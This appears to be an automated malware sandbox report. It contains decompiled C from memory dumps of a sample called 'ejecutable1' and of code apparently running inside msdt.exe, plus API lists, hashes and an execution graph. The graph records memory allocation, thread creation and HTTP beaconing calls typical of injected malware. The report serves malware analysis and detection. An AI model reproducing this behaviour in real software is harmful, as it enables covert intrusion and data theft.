                                                                    									L008E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                    									L008E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                    									_t130 = _t130 + 1;
                                                                    									_t160 = _t158 + 0x28;
                                                                    									__eflags = _t130 - 2;
                                                                    									if(__eflags > 0) {
                                                                    										E0091217A(_t106, __eflags, _t96);
                                                                    									}
                                                                    									_push("RTL: Re-Waiting\n");
                                                                    									_push(0);
                                                                    									_push(0x65);
                                                                    									L008E3F92();
                                                                    									_t158 = _t160 + 0xc;
                                                                    								}
                                                                    								__eflags = _t51;
                                                                    								if(__eflags < 0) {
                                                                    									_push(_t51);
                                                                    									L008D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                    									asm("int3");
                                                                    									while(1) {
                                                                    										L32:
                                                                    										__eflags = _a8;
                                                                    										if(_a8 == 0) {
                                                                    											break;
                                                                    										}
                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                    										_t119 = _t96 + 0x24;
                                                                    										_t107 = 1;
                                                                    										asm("lock xadd [eax], ecx");
                                                                    										_t56 =  *(_t96 + 0x28);
                                                                    										_a4 = _t56;
                                                                    										__eflags = _t56;
                                                                    										if(_t56 != 0) {
                                                                    											L40:
                                                                    											_t128 = 0;
                                                                    											__eflags = 0;
                                                                    											while(1) {
                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                    												asm("sbb esi, esi");
                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009701c0;
                                                                    												_push(_t138);
                                                                    												_push(0);
                                                                    												_t58 = L0088F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                    												__eflags = _t58 - 0x102;
                                                                    												if(_t58 != 0x102) {
                                                                    													break;
                                                                    												}
                                                                    												_t107 =  *(_t138 + 4);
                                                                    												_t125 =  *_t138;
                                                                    												_t75 = L008D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                    												_push(_t125);
                                                                    												_push(_t75);
                                                                    												L008E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                    												L008E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                    												_t128 = _t128 + 1;
                                                                    												_t159 = _t158 + 0x28;
                                                                    												__eflags = _t128 - 2;
                                                                    												if(__eflags > 0) {
                                                                    													E0091217A(_t107, __eflags, _t96);
                                                                    												}
                                                                    												_push("RTL: Re-Waiting\n");
                                                                    												_push(0);
                                                                    												_push(0x65);
                                                                    												L008E3F92();
                                                                    												_t158 = _t159 + 0xc;
                                                                    											}
                                                                    											__eflags = _t58;
                                                                    											if(__eflags < 0) {
                                                                    												_push(_t58);
                                                                    												L008D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                    												asm("int3");
                                                                    												_t61 =  *_t107;
                                                                    												 *_t107 = 0;
                                                                    												__eflags = _t61;
                                                                    												if(_t61 == 0) {
                                                                    													L1:
                                                                    													_t63 = E008B5384(_t138 + 0x24);
                                                                    													if(_t63 != 0) {
                                                                    														goto L52;
                                                                    													} else {
                                                                    														goto L2;
                                                                    													}
                                                                    												} else {
                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                    													_push( &_a4);
                                                                    													_push(_t61);
                                                                    													_t70 = L0088F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                    													__eflags = _t70;
                                                                    													if(__eflags >= 0) {
                                                                    														goto L1;
                                                                    													} else {
                                                                    														_push(_t70);
                                                                    														L008D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                    														L52:
                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                    														_push( &_a4);
                                                                    														_push(1);
                                                                    														_t63 = L0088F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                    														__eflags = _t63;
                                                                    														if(__eflags >= 0) {
                                                                    															L2:
                                                                    															return _t63;
                                                                    														} else {
                                                                    															_push(_t63);
                                                                    															L008D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                    															_push( &_a4);
                                                                    															_push(1);
                                                                    															_t63 = L0088F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                    															__eflags = _t63;
                                                                    															if(__eflags >= 0) {
                                                                    																goto L2;
                                                                    															} else {
                                                                    																_push(_t63);
                                                                    																_t66 = L008D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                    																asm("int3");
                                                                    																while(1) {
                                                                    																	_t110 = _t66;
                                                                    																	__eflags = _t66 - 1;
                                                                    																	if(_t66 != 1) {
                                                                    																		break;
                                                                    																	}
                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                    																	_t66 = _t110;
                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                    																	__eflags = _t66 - _t110;
                                                                    																	if(_t66 != _t110) {
                                                                    																		continue;
                                                                    																	} else {
                                                                    																		_t67 =  *[fs:0x18];
                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                    																		return _t67;
                                                                    																	}
                                                                    																	goto L58;
                                                                    																}
                                                                    																E008B5329(_t110, _t138);
                                                                    																return E008B53A5(_t138, 1);
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											} else {
                                                                    												_t56 =  *(_t96 + 0x28);
                                                                    												goto L3;
                                                                    											}
                                                                    										} else {
                                                                    											_t107 =  *_t119;
                                                                    											__eflags = _t107;
                                                                    											if(__eflags > 0) {
                                                                    												while(1) {
                                                                    													_t81 = _t107;
                                                                    													asm("lock cmpxchg [edi], esi");
                                                                    													__eflags = _t81 - _t107;
                                                                    													if(_t81 == _t107) {
                                                                    														break;
                                                                    													}
                                                                    													_t107 = _t81;
                                                                    													__eflags = _t81;
                                                                    													if(_t81 > 0) {
                                                                    														continue;
                                                                    													}
                                                                    													break;
                                                                    												}
                                                                    												_t56 = _a4;
                                                                    												__eflags = _t107;
                                                                    											}
                                                                    											if(__eflags != 0) {
                                                                    												while(1) {
                                                                    													L3:
                                                                    													__eflags = _t56;
                                                                    													if(_t56 != 0) {
                                                                    														goto L32;
                                                                    													}
                                                                    													_t107 = _t107 | 0xffffffff;
                                                                    													_t56 = 0;
                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                    													__eflags = 0;
                                                                    													if(0 != 0) {
                                                                    														continue;
                                                                    													} else {
                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                    														return 1;
                                                                    													}
                                                                    													goto L58;
                                                                    												}
                                                                    												continue;
                                                                    											} else {
                                                                    												goto L40;
                                                                    											}
                                                                    										}
                                                                    										goto L58;
                                                                    									}
                                                                    									__eflags = 0;
                                                                    									return 0;
                                                                    								} else {
                                                                    									_t115 =  *(_t96 + 0x28);
                                                                    									continue;
                                                                    								}
                                                                    							} else {
                                                                    								_t106 =  *_t49;
                                                                    								__eflags = _t106;
                                                                    								if(__eflags > 0) {
                                                                    									while(1) {
                                                                    										_t93 = _t106;
                                                                    										asm("lock cmpxchg [edi], esi");
                                                                    										__eflags = _t93 - _t106;
                                                                    										if(_t93 == _t106) {
                                                                    											break;
                                                                    										}
                                                                    										_t106 = _t93;
                                                                    										__eflags = _t93;
                                                                    										if(_t93 > 0) {
                                                                    											continue;
                                                                    										}
                                                                    										break;
                                                                    									}
                                                                    									__eflags = _t106;
                                                                    								}
                                                                    								if(__eflags != 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L23;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						goto L58;
                                                                    					}
                                                                    					_t84 = _t115;
                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                    					__eflags = _t84 - _t115;
                                                                    					if(_t84 != _t115) {
                                                                    						_t115 = _t84;
                                                                    						goto L7;
                                                                    					} else {
                                                                    						return 1;
                                                                    					}
                                                                    				}
                                                                    				L58:
                                                                    			}

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F2206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-4236105082
                                                                    • Opcode ID: 3a36cad541c3b1a8745596b6d7d5b600488f5d3e9e098e6f902c22e31aedbadc
                                                                    • Instruction ID: 9733c2f1b7c8a9b6357dc84b03aa8b10b6fa0e8b969a6f341ab21dc7cd1ce415
                                                                    • Opcode Fuzzy Hash: 3a36cad541c3b1a8745596b6d7d5b600488f5d3e9e098e6f902c22e31aedbadc
                                                                    • Instruction Fuzzy Hash: DF514C31B002056BDB14DA28CC81FB673A9FF95714F254229FE58DB385D971EC418B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 64%
                                                                    			E008D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                    				signed int _v8;
                                                                    				char _v10;
                                                                    				char _v140;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t24;
                                                                    				void* _t26;
                                                                    				signed int _t29;
                                                                    				signed int _t34;
                                                                    				signed int _t40;
                                                                    				intOrPtr _t45;
                                                                    				void* _t51;
                                                                    				intOrPtr* _t52;
                                                                    				void* _t54;
                                                                    				signed int _t57;
                                                                    				void* _t58;
                                                                    
                                                                    				_t51 = __edx;
                                                                    				_t24 =  *0x972088; // 0x777ffed6
                                                                    				_v8 = _t24 ^ _t57;
                                                                    				_t45 = _a16;
                                                                    				_t53 = _a4;
                                                                    				_t52 = _a20;
                                                                    				if(_a4 == 0 || _t52 == 0) {
                                                                    					L10:
                                                                    					_t26 = 0xc000000d;
                                                                    				} else {
                                                                    					if(_t45 == 0) {
                                                                    						if( *_t52 == _t45) {
                                                                    							goto L3;
                                                                    						} else {
                                                                    							goto L10;
                                                                    						}
                                                                    					} else {
                                                                    						L3:
                                                                    						_t28 =  &_v140;
                                                                    						if(_a12 != 0) {
                                                                    							_push("[");
                                                                    							_push(0x41);
                                                                    							_push( &_v140);
                                                                    							_t29 = L008C7707();
                                                                    							_t58 = _t58 + 0xc;
                                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                    						}
                                                                    						_t54 = E008D13CB(_t53, _t28);
                                                                    						if(_a8 != 0) {
                                                                    							_t34 = L008C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                    							_t58 = _t58 + 0x10;
                                                                    							_t54 = _t54 + _t34 * 2;
                                                                    						}
                                                                    						if(_a12 != 0) {
                                                                    							_t40 = L008C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                    							_t58 = _t58 + 0x10;
                                                                    							_t54 = _t54 + _t40 * 2;
                                                                    						}
                                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                    						 *_t52 = _t53;
                                                                    						if( *_t52 < _t53) {
                                                                    							goto L10;
                                                                    						} else {
                                                                    							E00892340(_t45,  &_v140, _t53 + _t53);
                                                                    							_t26 = 0;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E0089E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                    			}

                                                                    Instruction addresses (address column of the C-code listing above; the other columns were not extracted): 0x008d14c0, 0x008d14cb, 0x008d14d2, 0x008d14d6, 0x008d14da, 0x008d14de, 0x008d14e3, 0x008d157a, 0x008d157a, 0x008d14f1, 0x008d14f3, 0x008fea0f, 0x00000000, 0x008fea15, 0x00000000, 0x008fea15, 0x008d14f9, 0x008d14f9, 0x008d14fe, 0x008d1504, 0x008fea1a, 0x008fea1f, 0x008fea21, 0x008fea22, 0x008fea27, 0x008fea2a, 0x008fea2a, 0x008d1515, 0x008d1517, 0x008d156d, 0x008d1572, 0x008d1575, 0x008d1575, 0x008d151e, 0x008fea50, 0x008fea55, 0x008fea58, 0x008fea58, 0x008d152e, 0x008d1531, 0x008d1533, 0x00000000, 0x008d1535, 0x008d1541, 0x008d1549, 0x008d1549, 0x008d1533, 0x008d14f3, 0x008d1559

                                                                    APIs
                                                                    • ___swprintf_l.LIBCMT ref: 008FEA22
                                                                      • Part of subcall function 008D13CB: ___swprintf_l.LIBCMT ref: 008D146B
                                                                      • Part of subcall function 008D13CB: ___swprintf_l.LIBCMT ref: 008D1490
                                                                    • ___swprintf_l.LIBCMT ref: 008D156D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 8ffdb60663d5b0e13690cd6ab59bf216a2de8c5d5925880a6b733c6d4bec7d37
                                                                    • Instruction ID: 043ca6f9231e86c2e0280d588da815a0e106ebac2fc03cb8c0c15df963e11d90
                                                                    • Opcode Fuzzy Hash: 8ffdb60663d5b0e13690cd6ab59bf216a2de8c5d5925880a6b733c6d4bec7d37
                                                                    • Instruction Fuzzy Hash: F821B17290022DABCF20EE68DC45AEA77BCFF50704F444216F946D3240DB79DA588BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E008B53A5(signed int _a4, char _a8) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t32;
                                                                    				signed int _t37;
                                                                    				signed int _t40;
                                                                    				signed int _t42;
                                                                    				void* _t45;
                                                                    				intOrPtr _t46;
                                                                    				signed int _t49;
                                                                    				void* _t51;
                                                                    				signed int _t57;
                                                                    				signed int _t64;
                                                                    				signed int _t71;
                                                                    				void* _t74;
                                                                    				intOrPtr _t78;
                                                                    				signed int* _t79;
                                                                    				void* _t85;
                                                                    				signed int _t86;
                                                                    				signed int _t92;
                                                                    				void* _t104;
                                                                    				void* _t105;
                                                                    
                                                                    				_t64 = _a4;
                                                                    				_t32 =  *(_t64 + 0x28);
                                                                    				_t71 = _t64 + 0x28;
                                                                    				_push(_t92);
                                                                    				if(_t32 < 0) {
                                                                    					_t78 =  *[fs:0x18];
                                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						__eflags = _t32 | 0xffffffff;
                                                                    						asm("lock xadd [ecx], eax");
                                                                    						return 1;
                                                                    					}
                                                                    				} else {
                                                                    					L3:
                                                                    					_push(_t86);
                                                                    					while(1) {
                                                                    						L4:
                                                                    						__eflags = _t32;
                                                                    						if(_t32 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _a8;
                                                                    						if(_a8 == 0) {
                                                                    							__eflags = 0;
                                                                    							return 0;
                                                                    						} else {
                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                    							_t79 = _t64 + 0x24;
                                                                    							_t71 = 1;
                                                                    							asm("lock xadd [eax], ecx");
                                                                    							_t32 =  *(_t64 + 0x28);
                                                                    							_a4 = _t32;
                                                                    							__eflags = _t32;
                                                                    							if(_t32 != 0) {
                                                                    								L19:
                                                                    								_t86 = 0;
                                                                    								__eflags = 0;
                                                                    								while(1) {
                                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                    									asm("sbb esi, esi");
                                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009701c0;
                                                                    									_push(_t92);
                                                                    									_push(0);
                                                                    									_t37 = L0088F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                    									__eflags = _t37 - 0x102;
                                                                    									if(_t37 != 0x102) {
                                                                    										break;
                                                                    									}
                                                                    									_t71 =  *(_t92 + 4);
                                                                    									_t85 =  *_t92;
                                                                    									_t51 = L008D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                    									_push(_t85);
                                                                    									_push(_t51);
                                                                    									L008E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                    									L008E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                    									_t86 = _t86 + 1;
                                                                    									_t105 = _t104 + 0x28;
                                                                    									__eflags = _t86 - 2;
                                                                    									if(__eflags > 0) {
                                                                    										E0091217A(_t71, __eflags, _t64);
                                                                    									}
                                                                    									_push("RTL: Re-Waiting\n");
                                                                    									_push(0);
                                                                    									_push(0x65);
                                                                    									L008E3F92();
                                                                    									_t104 = _t105 + 0xc;
                                                                    								}
                                                                    								__eflags = _t37;
                                                                    								if(__eflags < 0) {
                                                                    									_push(_t37);
                                                                    									L008D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                    									asm("int3");
                                                                    									_t40 =  *_t71;
                                                                    									 *_t71 = 0;
                                                                    									__eflags = _t40;
                                                                    									if(_t40 == 0) {
                                                                    										L1:
                                                                    										_t42 = E008B5384(_t92 + 0x24);
                                                                    										if(_t42 != 0) {
                                                                    											goto L31;
                                                                    										} else {
                                                                    											goto L2;
                                                                    										}
                                                                    									} else {
                                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                    										_push( &_a4);
                                                                    										_push(_t40);
                                                                    										_t49 = L0088F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                    										__eflags = _t49;
                                                                    										if(__eflags >= 0) {
                                                                    											goto L1;
                                                                    										} else {
                                                                    											_push(_t49);
                                                                    											L008D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                    											L31:
                                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                    											_push( &_a4);
                                                                    											_push(1);
                                                                    											_t42 = L0088F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                    											__eflags = _t42;
                                                                    											if(__eflags >= 0) {
                                                                    												L2:
                                                                    												return _t42;
                                                                    											} else {
                                                                    												_push(_t42);
                                                                    												L008D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                    												_push( &_a4);
                                                                    												_push(1);
                                                                    												_t42 = L0088F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                    												__eflags = _t42;
                                                                    												if(__eflags >= 0) {
                                                                    													goto L2;
                                                                    												} else {
                                                                    													_push(_t42);
                                                                    													_t45 = L008D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                    													asm("int3");
                                                                    													while(1) {
                                                                    														_t74 = _t45;
                                                                    														__eflags = _t45 - 1;
                                                                    														if(_t45 != 1) {
                                                                    															break;
                                                                    														}
                                                                    														_t86 = _t86 | 0xffffffff;
                                                                    														_t45 = _t74;
                                                                    														asm("lock cmpxchg [ebx], edi");
                                                                    														__eflags = _t45 - _t74;
                                                                    														if(_t45 != _t74) {
                                                                    															continue;
                                                                    														} else {
                                                                    															_t46 =  *[fs:0x18];
                                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                    															return _t46;
                                                                    														}
                                                                    														goto L37;
                                                                    													}
                                                                    													E008B5329(_t74, _t92);
                                                                    													_push(1);
                                                                    													return E008B53A5(_t92);
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									_t32 =  *(_t64 + 0x28);
                                                                    									continue;
                                                                    								}
                                                                    							} else {
                                                                    								_t71 =  *_t79;
                                                                    								__eflags = _t71;
                                                                    								if(__eflags > 0) {
                                                                    									while(1) {
                                                                    										_t57 = _t71;
                                                                    										asm("lock cmpxchg [edi], esi");
                                                                    										__eflags = _t57 - _t71;
                                                                    										if(_t57 == _t71) {
                                                                    											break;
                                                                    										}
                                                                    										_t71 = _t57;
                                                                    										__eflags = _t57;
                                                                    										if(_t57 > 0) {
                                                                    											continue;
                                                                    										}
                                                                    										break;
                                                                    									}
                                                                    									_t32 = _a4;
                                                                    									__eflags = _t71;
                                                                    								}
                                                                    								if(__eflags != 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L19;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						goto L37;
                                                                    					}
                                                                    					_t71 = _t71 | 0xffffffff;
                                                                    					_t32 = 0;
                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                    					__eflags = 0;
                                                                    					if(0 != 0) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                    						return 1;
                                                                    					}
                                                                    				}
                                                                    				L37:
                                                                    			}

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F22F4
                                                                    Strings
                                                                    • RTL: Resource at %p, xrefs: 008F230B
                                                                    • RTL: Re-Waiting, xrefs: 008F2328
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008F22FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-871070163
                                                                    • Opcode ID: 5c3435015d093840a1535db9ae62f7347c20b4b3f3fe4f555c07318b4e33e50a
                                                                    • Instruction ID: ddec201a34dbdc4dc6bb227bbb74b8af168407c6a8d1efafce56bab452fe9458
                                                                    • Opcode Fuzzy Hash: 5c3435015d093840a1535db9ae62f7347c20b4b3f3fe4f555c07318b4e33e50a
                                                                    • Instruction Fuzzy Hash: 245104716006056BDB11AF39CC81FA677E8FF59364F104229FE18DB381EA75ED428BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:2.8%
                                                                    Dynamic/Decrypted Code Coverage:4.7%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:449
                                                                    Total number of Limit Nodes:64

108751 44872->44874 44875 10873c 44873->44875 44874->44779 44875->44874 44876 118700 NtClose 44875->44876 44876->44874 44878 10d3c0 LdrInitializeThunk 44877->44878 44879 1175d2 44878->44879 44879->44794 44881 107298 44880->44881 44882 109b30 LdrLoadDll 44881->44882 44883 1072b3 44882->44883 44884 1072cc PostThreadMessageW 44883->44884 44885 1072fd 44883->44885 44884->44885 44886 1072e0 44884->44886 44885->44725 44887 1072ea PostThreadMessageW 44886->44887 44887->44885 44889 10bdd3 44888->44889 44890 10d1f0 2 API calls 44889->44890 44891 10be3d 44890->44891 44891->44864 44893 103d96 44892->44893 44894 10b330 2 API calls 44893->44894 44896 103e61 44894->44896 44895 103e68 44895->44867 44896->44895 44909 10b3f0 44896->44909 44900 104083 44901 11a010 NtAllocateVirtualMemory 44900->44901 44902 104110 44901->44902 44903 11a010 NtAllocateVirtualMemory 44902->44903 44904 10412a 44903->44904 44904->44867 44907 117441 44905->44907 44906 117467 44906->44870 44907->44906 44908 117454 CreateThread 44907->44908 44908->44870 44910 10b415 44909->44910 44917 118300 44910->44917 44913 118390 44914 1183ac 44913->44914 44922 258fab8 LdrInitializeThunk 44914->44922 44915 1183cb 44915->44900 44918 11831c 44917->44918 44921 258fb50 LdrInitializeThunk 44918->44921 44919 10405c 44919->44900 44919->44913 44921->44919 44922->44915 44924 11811c 44923->44924 44927 258fd8c LdrInitializeThunk 44924->44927 44925 10d3fe 44925->44725 44927->44925 45027 25ad298 14 API calls _vswprintf_s 45030 25b4f9a 9 API calls 2 library calls 44436 1070d8 LdrInitializeThunk 45033 2580184 6 API calls ___swprintf_l 44983 25a98ba 10 API calls 44390 1172f0 44398 11a010 44390->44398 44392 11740c 44393 11732b 44393->44392 44401 109b30 44393->44401 44395 117390 Sleep 44397 117361 44395->44397 44397->44392 44397->44395 44405 116f20 44397->44405 44416 1187b0 44398->44416 44400 11a03d 44400->44393 44402 109b54 44401->44402 44403 109b90 LdrLoadDll 44402->44403 44404 109b5b 44402->44404 44403->44404 44404->44397 44406 116f45 
44405->44406 44408 116f9f 44406->44408 44419 118bf0 44406->44419 44415 117036 44408->44415 44423 118c60 44408->44423 44410 116fe0 44410->44415 44427 118ce0 44410->44427 44412 11700d 44413 117016 44412->44413 44431 118d60 44412->44431 44413->44397 44415->44397 44417 1191d0 44416->44417 44418 1187cc NtAllocateVirtualMemory 44417->44418 44418->44400 44420 118c2a 44419->44420 44421 118c33 InternetOpenA 44420->44421 44422 118c4e 44420->44422 44421->44408 44422->44408 44424 118c9f 44423->44424 44425 118ca8 InternetConnectA 44424->44425 44426 118ccf 44424->44426 44425->44410 44426->44410 44428 118d1f 44427->44428 44429 118d28 HttpOpenRequestA 44428->44429 44430 118d4f 44428->44430 44429->44412 44430->44412 44432 118d9f 44431->44432 44433 118dc3 44432->44433 44434 118da8 HttpSendRequestA 44432->44434 44433->44415 44434->44415

                                                                    Executed Functions

                                                                    Control-flow Graph

                                                                    control_flow_graph 192 1185d0-118621 call 1191d0 NtCreateFile
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00113BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00113BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0011861D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 15e33179a6b811717d084366a7942d3dac093fab415c6bf3812070b8ba0f73b9
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: CEF0BDB2200208ABCB08DF88DC95EEB77EDAF8C754F158248BA1D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(00113D62,5E972F65,FFFFFFFF,00113A21,?,?,00113D62,?,00113A21,FFFFFFFF,5E972F65,00113D62,?,00000000), ref: 001186C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
